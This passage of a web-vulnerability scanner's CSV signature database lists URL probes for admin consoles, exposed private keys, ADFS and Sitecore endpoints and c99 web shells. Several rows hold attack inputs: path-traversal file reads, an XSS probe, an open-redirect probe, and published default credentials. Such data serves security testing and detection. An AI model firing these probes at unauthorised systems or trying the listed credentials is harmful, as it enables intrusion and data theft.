username/password.\",\"\",\"\"\n\"006641\",\"\",\"b\",\"/menu/neo\",\"GET\",\"BODY:Citrix\\sLogin\",\"Citrix Access Gateway login page detected.\",\"\",\"\"\n\"006642\",\"\",\"b\",\"/eprise\",\"GET\",\"BODY:SilkRoad\\sEprise\",\"SilkRoad Eprise CMS login found.\",\"\",\"\"\n\"006643\",\"\",\"b\",\"/eprise/local/systempages/login/\",\"GET\",\"BODY:Eprise:\\sLogin\",\"SilkRoad Eprise CMS login found.\",\"\",\"\"\n\"006644\",\"\",\"bd\",\"/eprise/WebServices/\",\"GET\",\"BODY:Eprise\\sWeb\\sService\",\"SilkRoad Eprise WebServices found.\",\"\",\"\"\n\"006645\",\"\",\"b\",\"/documents/appserver/default.htm\",\"GET\",\"BODY:Application\\sServer\\sKnowledge\\sBase\",\"Agfa Impex Application Server KB found.\",\"\",\"\"\n\"006646\",\"\",\"b\",\"/documents/default.htm\",\"GET\",\"BODY:IMPAX\\sDocumentation\",\"Agfa Impex Application Server documentation found.\",\"\",\"\"\n\"006647\",\"\",\"d\",\"/AgfaHC.BackOffice.Web.Services/BackOfficeService.asmx\",\"GET\",\"BODY:BackOfficeWebService\\sWeb\\sService\",\"Agfa Impex WebService\",\"\",\"\"\n\"006648\",\"\",\"b2\",\"/eprsup/sitegenhelp/content/content.htm\",\"GET\",\"BODY:Content\\sCenter\",\"SilkRoad Eprise documentation.\",\"\",\"\"\n\"006649\",\"\",\"b2\",\"/eprsup/eWebEditPro2/test.htm\",\"GET\",\"BODY:License\\sKeys\",\"SilkRoad Eprise has Ektron WebEditPro2 installed--test file found.\",\"\",\"\"\n\"006650\",\"\",\"b2\",\"/eWebEditPro2/test.htm\",\"GET\",\"BODY:License\\skeys\",\"Ektron WebEditPro2 test/sample file found.\",\"\",\"\"\n\"006651\",\"\",\"b2\",\"/ewebeditpro2/samples/asp/database/index.asp\",\"GET\",\"BODY:Ektron\\sWebEditPro\",\"Ektron WebEditPro2 test/sample file found.\",\"\",\"\"\n\"006652\",\"\",\"b2\",\"/ewebeditpro2/samples/coldfusion/database/index.cfm\",\"GET\",\"BODY:Ektron\\sWebEditPro\",\"Ektron WebEditPro2 test/sample file found.\",\"\",\"\"\n\"006653\",\"\",\"b2\",\"/ewebeditpro2/samples/jsp/database/index.jsp\",\"GET\",\"BODY:Ektron\\sWebEditPro\",\"Ektron WebEditPro2 test/sample file found.\",\"\",\"\"\n\"006654\",\"\",\"b2\",\"/eprsup/ewebeditpro2/samples/asp/database/index.asp\",\"GET\",\"BODY:Ektron\\sWebEditPro\",\"Ektron WebEditPro2 test/sample file found.\",\"\",\"\"\n\"006655\",\"\",\"b2\",\"/eprsup/ewebeditpro2/samples/coldfusion/database/index.cfm\",\"GET\",\"BODY:Ektron\\sWebEditPro\",\"Ektron WebEditPro2 test/sample file found.\",\"\",\"\"\n\"006656\",\"\",\"b2\",\"/eprsup/ewebeditpro2/samples/jsp/database/index.jsp\",\"GET\",\"BODY:Ektron\\sWebEditPro\",\"Ektron WebEditPro2 test/sample file found.\",\"\",\"\"\n\"006657\",\"\",\"b2\",\"/eprsup/ewebeditpro2/samples/php/database/index.php\",\"GET\",\"BODY:Ektron\\sWebEditPro\",\"Ektron WebEditPro2 test/sample file found.\",\"\",\"\"\n\"006658\",\"\",\"b2\",\"/ewebeditpro2/samples/php/database/index.php\",\"GET\",\"BODY:Ektron\\sWebEditPro\",\"Ektron WebEditPro2 test/sample file found.\",\"\",\"\"\n\"006659\",\"\",\"2\",\"/eprise/samples/samples2004/content/index.htm\",\"GET\",\"BODY:Samples\\sCollection\",\"SilkRoad Eprise CMS samples found. Functionality may include creating users or uploading files.\",\"\",\"\"\n\"006660\",\"\",\"2\",\"/eprise/samples/QuickForms/PageFromStyle/CreatePageFromStyle\",\"GET\",\"BODY:Into\\sthe\\sFolder\",\"SilkRoad Eprise CMS create page shows a list of directories on the web site (backend CMS paths).\",\"\",\"\"\n\"006661\",\"\",\"b1\",\"/mychart/adminlogin.asp\",\"GET\",\"BODY:licensed\\sfrom\\sEpic\",\"Epic Systems MyChart admin login found\",\"\",\"\"\n\"006662\",\"\",\"12\",\"/exception.php\",\"GET\",\"CODE:200\",\"PHP Exceptions File\",\"\",\"\"\n\"006663\",\"\",\"b\",\"@MAGENTOinstall.php\",\"GET\",\"BODY:Magento\\salready\\sinstalled\",\"Magento install.php file found.\",\"\",\"\"\n\"006664\",\"\",\"2b\",\"@MAGENTOdownloader/\",\"GET\",\"BODY:Welcome\\sto\\sMagento\",\"Magento installer found and installation is not complete.\",\"\",\"\"\n\"006665\",\"\",\"2b\",\"@MAGENTOdownloader.php\",\"GET\",\"BODY:Welcome\\sto\\sMagento\",\"Magento installer found and installation is not complete.\",\"\",\"\"\n\"006666\",\"\",\"b\",\"@WORDPRESSwp-admin/wp-login.php\",\"GET\",\"BODY:Powered\\sby\\sWordPress\",\"WordPress login found\",\"\",\"\"\n\"006667\",\"\",\"b\",\"/blog/wp-login.php\",\"GET\",\"BODY:Powered\\sby\\sWordPress\",\"WordPress login found\",\"\",\"\"\n\"006668\",\"\",\"b\",\"@WORDPRESSwp-login.php\",\"GET\",\"BODY:Powered\\sby\\sWordPress\",\"WordPress login found\",\"\",\"\"\n\"006669\",\"\",\"2\",\"/adfs/ls/?wa=wsignout1.0\",\"GET\",\"CODE:200&&BODY:method=\\\"post\\\" action=\\\"\\/adfs\\/ls\\/\\?wa=wsignout1\\.0\\\" id=\\\"aspnetForm\\\"\",\"Active Directory Federation Services sign out page found.\",\"\",\"\"\n\"006670\",\"\",\"2\",\"/adfs/ls/?wa=wsignin1.0&wtrealm=http://www.cirt.net/\",\"GET\",\"CODE:200&&BODY:method=\\\"post\\\" action=\\\"\\/adfs\\/ls\\/\\?wa=wsignin1\\.0\\&wtrealm=http:\\/\\/www\\.cirt\\.net\\/\\\" id=\\\"aspnetForm\\\"\",\"Active Directory Federation Services sign in page found.\",\"\",\"\"\n\"006672\",\"\",\"b\",\"@PHPMYADMINDocumentation.html\",\"GET\",\"BODY:phpMyAdmin .* Documentation&&CODE:200\",\"phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.\",\"\",\"\"\n\"006673\",\"https://soroush.secproject.com/blog/2012/11/file-in-the-hole/\",\"0\",\"@FCKEDITOR_whatsnew.html\",\"GET\",\"BODY:Version\\s2\\.(?:6\\.[0-8]|5\\.\\d+)<\",\"FCKEditor versions below 2.6.9 allow file upload restriction bypasses.\",\"\",\"\"\n\"006674\",\"\",\"3\",\"/apc.php\",\"GET\",\"BODY:APC\\sINFO&&BODY:APCu\\sINFO\",\"APC/APCu Opcode Cache for PHP information script found\",\"\",\"\"\n\"006675\",\"\",\"b\",\"@TOMCATADMINhtml\",\"GET\",\"CODE:401\",\"Tomcat Manager / Host Manager interface found (pass protected)\",\"\",\"\"\n\"006676\",\"https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview\",\"2\",\"/adfs/services/proxytrustpolicystoretransfer\",\"GET\",\"CODE:200\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006677\",\"https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview\",\"2\",\"/adfs/fs/federationserverservice.asmx\",\"GET\",\"CODE:200\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006678\",\"https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview\",\"2\",\"/adfs/services/trust/samlprotocol/proxytrust\",\"GET\",\"CODE:200\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006679\",\"https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview\",\"2\",\"/adfs/services/trust/mexsoap\",\"GET\",\"CODE:200\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006680\",\"https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview\",\"2\",\"/adfs/services/trust/proxymexhttpget/\",\"GET\",\"CODE:200\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006681\",\"https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview\",\"2\",\"/adfs/services/trust/proxymex\",\"GET\",\"CODE:200\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006683\",\"https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview\",\"2\",\"/adfs/services/trust/2005/windowstransport\",\"GET\",\"CODE:200\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006684\",\"https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview\",\"2\",\"/adfs/services/trust/2005/certificatemixed\",\"GET\",\"CODE:200\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006685\",\"https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview\",\"2\",\"/adfs/services/trust/2005/certificatetransport\",\"GET\",\"CODE:200\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006686\",\"https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview\",\"2\",\"/adfs/services/trust/2005/usernamemixed\",\"GET\",\"CODE:200\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006687\",\"https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview\",\"2\",\"/adfs/services/trust/2005/kerberosmixed\",\"GET\",\"CODE:200\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006688\",\"https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview\",\"2\",\"/adfs/services/trust/2005/issuedtokenmixedasymmetricbasic256\",\"GET\",\"CODE:200\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006689\",\"https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview\",\"2\",\"/adfs/services/trust/2005/issuedtokenmixedsymmetricbasic256\",\"GET\",\"CODE:200\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006690\",\"https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview\",\"2\",\"/adfs/services/trust/13/kerberosmixed\",\"GET\",\"CODE:200\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006691\",\"https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview\",\"2\",\"/adfs/services/trust/13/certificatemixed\",\"GET\",\"CODE:200\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006692\",\"https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview\",\"2\",\"/adfs/services/trust/13/usernamemixed\",\"GET\",\"CODE:200\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006693\",\"https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview\",\"2\",\"/adfs/services/trust/13/issuedtokenmixedasymmetricbasic256\",\"GET\",\"CODE:200\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006694\",\"https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview\",\"2\",\"/adfs/services/trust/13/issuedtokenmixedsymmetricbasic256\",\"GET\",\"CODE:200\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006695\",\"https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview\",\"2\",\"/adfs/services/trusttcp/windows\",\"GET\",\"CODE:200\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006696\",\"https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview\",\"2\",\"/adfs/services/trust/proxytrust\",\"GET\",\"CODE:200\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006697\",\"https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview\",\"2\",\"/adfs/services/trust/proxytrust13\",\"GET\",\"CODE:200\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006698\",\"https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview\",\"2\",\"/adfs/services/trust/proxytrustprovisionusername\",\"GET\",\"CODE:200\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006699\",\"https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview\",\"2\",\"/adfs/services/trust/proxytrustprovisionissuedtoken\",\"GET\",\"CODE:200\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006700\",\"https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview\",\"2\",\"/FederationMetadata/2007-06/\",\"GET\",\"CODE:200\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006701\",\"https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview\",\"2\",\"/Federationmetadata/2007-06/FederationMetadata.xml\",\"GET\",\"CODE:200\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006702\",\"https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview\",\"2\",\"/adfs/ls/IdpInitiatedSignon.aspx\",\"GET\",\"CODE:200\",\"Active Directory Federation Services page found.\",\"\",\"\"\n\"006703\",\"\",\"1e\",\"/console/\",\"GET\",\"CODE:200\",\"Application console found\",\"\",\"\"\n\"006704\",\"\",\"1\",\"/umbraco/login.aspx\",\"GET\",\"BODY:umbraco\\.org\",\"Umbraco admin login page found\",\"\",\"\"\n\"006705\",\"\",\"13\",\"/aspmenu/_notes/dwsync.xml\",\"GET\",\"BODY:file\\sname\",\"Adobe Dreamweaver dwsync.xml Remote Information Disclosure\",\"\",\"\"\n\"006707\",\"\",\"be\",\"@AXIS2axis2-admin/\",\"GET\",\"BODY:Axis2\\sadministration\\sconsole\",\"Apache Axis2 administration console found.\",\"\",\"\"\n\"006709\",\"\",\"b6\",\"/wsman/\",\"GET\",\"CODE:200&&CODE:403\",\"Windows Remote Management is enabled\",\"\",\"\"\n\"006710\",\"\",\"be\",\"/XMSPortal/\",\"GET\",\"BODY:XMS\\sCustomer\\sPortal\",\"XMS Portal found\",\"\",\"\"\n\"006711\",\"\",\"27\",\"/desktopmodules/feedbackdesigner/ajaxfbs/browser.html\",\"GET\",\"BODY:text\\seditor\",\"FCKEditor found\",\"\",\"\"\n\"006712\",\"\",\"20\",\"/desktopmodules/feedbackdesigner/ajaxfbs/frmupload.html\",\"GET\",\"BODY:text\\seditor\",\"FCKEditor file uploader found\",\"\",\"\"\n\"006713\",\"\",\"13\",\"/fantastico_fileslist.txt\",\"GET\",\"CODE:200\",\"fantastico_fileslist.txt file found. This file contains a list of all the files from the current directory.\",\"\",\"\"\n\"006714\",\"\",\"d\",\"/webservices/\",\"GET\",\"CODE:200\",\"Webservices found\",\"\",\"\"\n\"006715\",\"\",\"be\",\"/atg/bcc\",\"GET\",\"CODE:200\",\"Oracle ATG Business Control Center\",\"\",\"\"\n\"006716\",\"\",\"be\",\"/sqlJmsAdmin/\",\"GET\",\"BODY:SQL\\-JMS\\sAdmin\",\"Oracle ATG JMS SQL Admin\",\"\",\"\"\n\"006717\",\"\",\"e\",\"/dyn/admin/\",\"GET\",\"CODE:200\",\"Admin page found; possibly Oracle ATG\",\"\",\"\"\n\"006718\",\"\",\"e\",\"/pls/apex\",\"GET\",\"BODY:Application\\sExpress\\sAdministration\\sServices\",\"Oracle APEX admin found\",\"\",\"\"\n\"006719\",\"\",\"e\",\"/pls/apex_admin\",\"GET\",\"BODY:Application\\sExpress\\sAdministration\\sServices\",\"Oracle APEX admin found\",\"\",\"\"\n\"006720\",\"\",\"23\",\"/_layouts/userdisp.aspx\",\"GET\",\"BODY:User\\sinformation\",\"Sharepoint discloses user information\",\"\",\"\"\n\"006721\",\"\",\"23\",\"/_layouts/aclinv.aspx\",\"GET\",\"BODY:Add\\sUsers\",\"Sharepoint discloses user information\",\"\",\"\"\n\"006722\",\"\",\"23\",\"/_layouts/associatedgroups.aspx\",\"GET\",\"BODY:Edit\\sGroup\",\"Sharepoint discloses user information\",\"\",\"\"\n\"006723\",\"\",\"23\",\"/_layouts/groups.aspx\",\"GET\",\"BODY:People\\sand\\sGroups\",\"Sharepoint discloses user information\",\"\",\"\"\n\"006724\",\"\",\"23\",\"/_layouts/people.aspx\",\"GET\",\"BODY:People\\sand\\sGroups\",\"Sharepoint discloses user information\",\"\",\"\"\n\"006726\",\"\",\"23\",\"/_layouts/viewgrouppermissions.aspx\",\"GET\",\"BODY:The\\squery\\sstring\",\"Sharepoint discloses user information\",\"\",\"\"\n\"006727\",\"\",\"23\",\"/_vti_bin/spdisco.aspx\",\"GET\",\"BODY:<discovery\\s\",\"Sharepoint discloses WSDL information via this XML\",\"\",\"\"\n\"006728\",\"\",\"e\",\"/crx\",\"GET\",\"CODE:200\",\"Adobe CQ CRX Console\",\"\",\"\"\n\"006729\",\"\",\"e\",\"/system/console/configMgr\",\"GET\",\"CODE:200\",\"OSGi Apache Felix console\",\"\",\"\"\n\"006730\",\"\",\"e\",\"/system/console/bundles\",\"GET\",\"CODE:200\",\"OSGi Apache Felix console\",\"\",\"\"\n\"006731\",\"\",\"e\",\"/system/console\",\"GET\",\"CODE:200\",\"OSGi Apache Felix console\",\"\",\"\"\n\"006732\",\"\",\"0\",\"/repository/\",\"GET\",\"CODE:200\",\"CRX WebDAV upload\",\"\",\"\"\n\"006734\",\"\",\"0\",\"/cqresource/\",\"GET\",\"CODE:200\",\"CRX WebDAV upload\",\"\",\"\"\n\"006735\",\"\",\"3\",\"/etc/cloudservices\",\"GET\",\"CODE:200\",\"Adobe Experience Manager Cloud Service Information\",\"\",\"\"\n\"006736\",\"\",\"3\",\"/etc/reports\",\"GET\",\"CODE:200\",\"Adobe Experience Manager Reports\",\"\",\"\"\n\"006737\",\"https://seclists.org/fulldisclosure/2014/Feb/171\",\"7\",\"@WORDPRESSwp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_addgallery_page/static/jquery.filetree/connectors/jqueryFileTree.php\",\"POST\",\"BODY:etc&&BODY:windows&&CODE:200\",\"NextGEN Gallery LFI.\",\"dir=/\",\"\"\n\"006738\",\"\",\"8b\",\"@CGIDIRSc99.php\",\"GET\",\"CODE:200&&BODY:r57 c99 shell\",\"c99.php remote web shell\",\"\",\"\"\n\"006739\",\"\",\"8b\",\"/c99.php\",\"GET\",\"CODE:200&&BODY:r57 c99 shell\",\"c99.php remote web shell\",\"\",\"\"\n\"006740\",\"\",\"3\",\"/dumpinfo\",\"GET\",\"CODE:200&&BODY:Service\\sLocator\\sURL\\sMappings\",\"National Instruments Service Locator\",\"\",\"\"\n\"006741\",\"\",\"3\",\"/somenonexistingfile.epl\",\"GET\",\"BODY:404: somenonexistingfile\\.epl\\(1\\): Not found '\\/.*\\/somenonexistingfile\\.epl'\",\"Embperl 404 message discloses full file path\",\"\",\"\"\n\"006742\",\"\",\"1\",\"/umbraco/ping.aspx\",\"GET\",\"BODY:I'm alive!\",\"Umbraco ping page found\",\"\",\"\"\n\"006743\",\"\",\"3\",\"/Trace.axd\",\"GET\",\"BODY:Request\\sDetails&&BODY:Application\\sTrace\",\"Trace.axd can reveal application or system details\",\"\",\"\"\n\"006744\",\"\",\"a\",\"/SDE/timeout.aspx\",\"GET\",\"BODY:bmclabelbold\",\"BMC Service Desk Express found\",\"\",\"\"\n\"006745\",\"\",\"e\",\"/manage/CxSense/\",\"GET\",\"CODE:200&&BODY:SmartCipher\",\"Covertix SmartCipher Console Login detected. Default credentials are: admin:Admin\",\"\",\"\"\n\"006746\",\"\",\"3\",\"/manage/Logs/\",\"GET\",\"CODE:200\",\"Covertix SmartCipher Console Login and Web Service Log directory detected\",\"\",\"\"\n\"006747\",\"\",\"d\",\"/manage/CxSenseWebService/CxSense.asmx\",\"GET\",\"CODE:200&&BODY:CxSense\\sWeb\\sService\",\"Covertix SmartCipher Web Service detected\",\"\",\"\"\n\"006748\",\"\",\"d\",\"/ws/CxInternetDMZ.asmx\",\"GET\",\"CODE:200&&BODY:CxServerDMZ\",\"Covertix SmartCipher DMZ Server Web Service detected\",\"\",\"\"\n\"006749\",\"CVE-2009-0932\",\"7\",\"/horde/util/barcode.php?type=../../../../../../../../../../../etc/./hosts%00\",\"GET\",\"@LFI()\",\"Horde local file retrieval (LFI) found.\",\"\",\"\"\n\"006750\",\"https://owncloud.org/security/advisories/\",\"b\",\"@OWNCLOUDstatus.php\",\"GET\",\"BODY:\\{\\\"installed\\\":\\\"true\\\",\\\"(version|maintenance)\\\":\\\"&&CODE:200\",\"ownCloud/Nextcloud installation identified by status.php--see the program for the running version\",\"\",\"\"\n\"006751\",\"\",\"0\",\"@OWNCLOUDremote.php/webdav\",\"GET\",\"BODY:Generated\\sby\\sSabreDAV&&BODY:Sabre_DAV_Exception_NotAuthenticated\",\"ownCloud WebDAV file upload detected (pass protected), remote.php/caldav and remote.php/carddav are also valid\",\"\",\"\"\n\"006752\",\"\",\"1235\",\"@OWNCLOUD@OCFILES\",\"GET\",\"BODY:(?:\\\"app\\\":\\\"|\\\"reqId\\\":\\\"|This is used for testing whether htaccess|SQLite format)&&CODE:200\",\"Unprotected ownCloud data directory identified\",\"\",\"\"\n\"006754\",\"https://cirt.net/passwords?criteria=Seclore\",\"b\",\"@SECLOREWelcome.do\",\"GET\",\"CODE:200&&BODY:Powered\\sBy\\sFileSecure\",\"Seclore FileSecure installation detected. Default credentials are: root:changeonfirstlogin and sa:changeonfirstlogin.\",\"\",\"\"\n\"006755\",\"\",\"e\",\"/eyekit/eyekit.php\",\"GET\",\"CODE:200&&BODY:eyekit\\sRelease\",\"eyeKit CMS admin login detected\",\"\",\"\"\n\"006756\",\"\",\"12\",\"/rsa\",\"GET\",\"CODE:200\",\"Encryption key exposed\",\"\",\"\"\n\"006757\",\"\",\"12\",\"/rsa.old\",\"GET\",\"CODE:200\",\"Encryption key exposed\",\"\",\"\"\n\"006758\",\"\",\"12\",\"/dsa\",\"GET\",\"CODE:200\",\"Encryption key exposed\",\"\",\"\"\n\"006759\",\"\",\"12\",\"/dsa.old\",\"GET\",\"CODE:200\",\"Encryption key exposed\",\"\",\"\"\n\"006760\",\"\",\"12\",\"/id_rsa\",\"GET\",\"CODE:200\",\"Encryption key exposed\",\"\",\"\"\n\"006761\",\"\",\"12\",\"/id_rsa.old\",\"GET\",\"CODE:200\",\"Encryption key exposed\",\"\",\"\"\n\"006762\",\"\",\"12\",\"/id_dsa\",\"GET\",\"CODE:200\",\"Encryption key exposed\",\"\",\"\"\n\"006763\",\"\",\"12\",\"/id_dsa.old\",\"GET\",\"CODE:200\",\"Encryption key exposed\",\"\",\"\"\n\"006764\",\"\",\"12\",\"/identity\",\"GET\",\"CODE:200\",\"Encryption key exposed\",\"\",\"\"\n\"006765\",\"\",\"12\",\"/key\",\"GET\",\"CODE:200\",\"Encryption key exposed\",\"\",\"\"\n\"006766\",\"\",\"12\",\"/key.priv\",\"GET\",\"CODE:200\",\"Encryption key exposed\",\"\",\"\"\n\"006767\",\"\",\"2be\",\"/App_Config/sitecore/debug/Trace.xslt\",\"GET\",\"BODY:Elapsed\\ssince\",\"Sitecore CMS admin/restricted pages available\",\"\",\"\"\n\"006768\",\"\",\"2be\",\"/App_Config/sitecore/debug/Profile.xslt\",\"GET\",\"BODY:Most\\sItems\\sRead\",\"Sitecore CMS admin/restricted pages available\",\"\",\"\"\n\"006769\",\"\",\"2be\",\"/App_Config/sitecore/shell/sitecore.version.xml\",\"GET\",\"BODY:<major>\",\"Sitecore CMS admin/restricted pages available\",\"\",\"\"\n\"006770\",\"\",\"2be\",\"/App_Config/sitecore/admin/cache.aspx\",\"GET\",\"BODY:<title>Cache\\sAdmin\",\"Sitecore CMS admin/restricted pages available\",\"\",\"\"\n\"006771\",\"\",\"2be\",\"/App_Config/sitecore/admin/stats.aspx\",\"GET\",\"BODY:<title>Statistics\",\"Sitecore CMS admin/restricted pages available\",\"\",\"\"\n\"006772\",\"\",\"2be\",\"/App_Config/ConnectionStrings.config\",\"GET\",\"BODY:Sitecore\\sconnection\",\"Sitecore CMS admin/restricted pages available\",\"\",\"\"\n\"006773\",\"\",\"2be\",\"/web.config.Net3_5.MVC\",\"GET\",\"BODY:name=\\\"sitecore\",\"Sitecore CMS admin/restricted pages available (this is likely a default web.config)\",\"\",\"\"\n\"006774\",\"\",\"2be\",\"/web.config.Net4.MVC\",\"GET\",\"BODY:name=\\\"sitecore\",\"Sitecore CMS admin/restricted pages available (this is likely a default web.config)\",\"\",\"\"\n\"006775\",\"\",\"2be\",\"/sitecore_data/webdav.lic\",\"GET\",\"BODY:IT\\sHit\\sWebDAV\",\"Sitecore CMS license\",\"\",\"\"\n\"006776\",\"\",\"2be\",\"/sitecore%20modules/Shell/IndexViewer/MainForm.aspx\",\"GET\",\"BODY:Welcome\\sto\\sthe\\sIndexViewer\",\"Sitecore CMS admin/restricted pages available\",\"\",\"\"\n\"006777\",\"\",\"2be\",\"/sitecore/data/logs/nvelocity.log\",\"GET\",\"BODY:SimpleLog4NetLogSystem\",\"Sitecore CMS admin/restricted pages available\",\"\",\"\"\n\"006778\",\"\",\"2be\",\"/sitecore/debug/Profile.xslt\",\"GET\",\"BODY:Data\\sCache&&BODY:cachemiss\",\"Sitecore CMS admin/restricted pages available\",\"\",\"\"\n\"006779\",\"\",\"2be\",\"/sitecore/login/default.aspx\",\"GET\",\"BODY:LoginPanelOuter\",\"Sitecore CMS admin login\",\"\",\"\"\n\"006780\",\"\",\"2be\",\"/sitecore/shell/WebService/Service.asmx\",\"GET\",\"BODY:operations\\sare\\ssupported\",\"Sitecore CMS webservice found\",\"\",\"\"\n\"006781\",\"\",\"2be\",\"/?sc_mode=edit\",\"GET\",\"CODE:302&&BODY:sitecore\",\"Sitecore CMS is installed. This url redirects to the login page.\",\"\",\"\"\n\"006782\",\"\",\"2be\",\"/sitecore/admin/stats.aspx\",\"GET\",\"BODY:Renderings\",\"Sitecore CMS admin/restricted pages available\",\"\",\"\"\n\"006783\",\"\",\"2be\",\"/wcadmin/login.aspx\",\"GET\",\"BODY:QS\\/1\",\"QS/1 Webconnect administration panel\",\"\",\"\"\n\"006784\",\"https://seclists.org/fulldisclosure/2011/Jul/353\",\"4\",\"/sitecore/login?xmlcontrol=Application&url=http://www.example.com&ch=WindowChrome&ic=Applications%2f32x32%2fabout.png&he=About+Sitecore&ma=0&mi=0&re=\",\"GET\",\"BODY:src=\\\"http:\\/\\/www\\.example\\.com\",\"Sitecore CMS contains an arbitrary redirect vulnerability.\",\"\",\"\"\n\"006785\",\"CVE-2014-100004\",\"4\",\"/?xmlcontrol=body%20onload=alert(123)\",\"GET\",\"BODY:<body\\sONLOAD=ALERT\\s123\",\"Sitecore CMS vulnerable to Cross-Site Scripting\",\"\",\"\"\n\"006786\",\"\",\"be\",\"/crystal/enterprise10/admin/en/admin.cwr\",\"GET\",\"BODY:Crystal\\sManagement\\sConsole\",\"Crystal Enterprise Management Console found\",\"\",\"\"\n\"006787\",\"\",\"1\",\"/encrypt.aspx\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"006788\",\"\",\"1\",\"/decrypt.aspx\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"006789\",\"\",\"1\",\"/encrypt.php\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"006790\",\"\",\"1\",\"/decrypt.php\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"006791\",\"\",\"1\",\"/encrypt.asp\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"006792\",\"\",\"1\",\"/decrypt.asp\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"006793\",\"\",\"1\",\"/encrypt.jsp\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"006794\",\"\",\"1\",\"/decrypt.jsp\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"006795\",\"\",\"1\",\"/encrypt\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"006796\",\"\",\"1\",\"/decrypt\",\"GET\",\"CODE:200\",\"This might be interesting.\",\"\",\"\"\n\"006797\",\"\",\"0\",\"@FCKEDITOReditor/filemanager/browser/default/frmcreatefolder.html\",\"GET\",\"BODY:Create New Folder\",\"FCKeditor could allow files to be updated or edited by remote attackers.\",\"\",\"\"\n\"006798\",\"\",\"0\",\"@FCKEDITOReditor/filemanager/connectors/test.html\",\"GET\",\"BODY:FCKeditor\\s\\-\\sConnectors Tests\",\"FCKeditor could allow files to be updated or edited by remote attackers.\",\"\",\"\"\n\"006799\",\"\",\"0\",\"@FCKEDITOReditor/filemanager/connectors/uploadtest.html\",\"GET\",\"BODY:FCKeditor\\s\\-\\sUploaders Tests\",\"FCKeditor could allow files to be updated or edited by remote attackers.\",\"\",\"\"\n\"006800\",\"\",\"0\",\"@FCKEDITOReditor/filemanager/connectors/asp/connector.asp?Command=GetFolders&Type=File&CurrentFolder=%2F\",\"GET\",\"BODY:<\\/Connector>&&BODY:This\\sconnector\\sis\\sdisabled\",\"FCKeditor could allow files to be updated or edited by remote attackers.\",\"\",\"\"\n\"006801\",\"\",\"0\",\"@FCKEDITOReditor/filemanager/connectors/aspx/connector.aspx?Command=GetFolders&Type=File&CurrentFolder=%2F\",\"GET\",\"BODY:<\\/Connector>&&BODY:This\\sconnector\\sis\\sdisabled\",\"FCKeditor could allow files to be updated or edited by remote attackers.\",\"\",\"\"\n\"006802\",\"\",\"0\",\"@FCKEDITOReditor/filemanager/connectors/cfm/connector.cfm?Command=GetFolders&Type=File&CurrentFolder=%2F\",\"GET\",\"BODY:<\\/Connector>&&BODY:This\\sconnector\\sis\\sdisabled\",\"FCKeditor could allow files to be updated or edited by remote 